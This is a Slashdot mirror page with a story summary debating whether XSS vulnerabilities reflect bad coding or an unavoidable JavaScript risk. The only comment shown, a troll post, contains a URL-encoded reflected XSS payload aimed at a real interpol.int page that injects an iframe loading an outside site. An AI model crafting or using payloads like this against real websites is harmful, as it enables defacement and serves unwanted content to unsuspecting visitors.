Slashdot Mirror

← Back to Stories (view on slashdot.org)

XSS Vulnerabilities Reviewed and Re-Classified

Posted by ryuzaki0 on from the breaking-and-entering dept.

An anonymous reader writes "Security Analysts at NeoSmart Technologies have revisited the now-famous XSS-type security vulnerabilities and attempted to re-classify their status as a security vulnerability. The argument is that XSS vulnerabilities are not a mark of bad or insecure code but rather a nasty but unavoidable risk that's a part of JavaScript - and that even then, XSS 'vulnerable' sites are no less dangerous or vulnerable at heart." Are they unavoidable, or just a symptom of lazy coding, or both?

1 of 142 comments (clear)

  1. How about some XSS abuse at interpol by Anonymous Coward · · Score: -1, Troll

    http://www.interpol.int/Public/mail/mail.asp?id=fu g&subject=%22%3E%3Ciframe%20src=%22http://secret.o n.nimp.org?u=incog%22%3E